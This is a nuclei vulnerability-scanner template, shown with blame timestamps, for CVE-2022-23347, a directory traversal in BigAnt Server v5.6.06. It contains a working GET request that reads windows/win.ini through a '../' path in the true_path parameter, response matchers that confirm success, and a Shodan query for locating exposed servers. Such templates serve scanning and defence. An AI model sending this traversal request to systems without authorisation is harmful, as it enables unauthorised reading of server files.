nuclei-templates/cves/2022/CVE-2022-23347.yaml

39 lines
1.0 KiB
YAML
Raw Normal View History

2022-04-16 09:03:35 +00:00
id: CVE-2022-23347
info:
name: BigAnt Software BigAnt Server v5.6.06 - Directory Traversal
2022-04-16 09:10:32 +00:00
author: 0x_Akoko
2022-04-16 09:03:35 +00:00
severity: high
description: BigAnt Software BigAnt Server v5.6.06 was discovered to be vulnerable to directory traversal attacks.
reference:
- https://github.com/bzyo/cve-pocs/tree/master/CVE-2022-23347
2022-04-16 09:10:32 +00:00
- https://www.cvedetails.com/cve/CVE-2022-23347
- http://bigant.com
2022-04-16 09:03:35 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-16 09:03:35 +00:00
cvss-score: 7.5
cve-id: CVE-2022-23347
cwe-id: CWE-22
2022-04-16 13:29:35 +00:00
metadata:
shodan-query: http.html:"BigAnt"
2022-04-16 09:03:35 +00:00
tags: cve,cve2022,bigant,lfi
2022-04-16 09:10:32 +00:00
2022-04-16 09:03:35 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini"
2022-04-16 13:29:35 +00:00
matchers-condition: and
2022-04-16 09:03:35 +00:00
matchers:
- type: word
part: body
2022-04-16 09:03:35 +00:00
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
2022-04-16 13:29:35 +00:00
- type: status
status:
- 200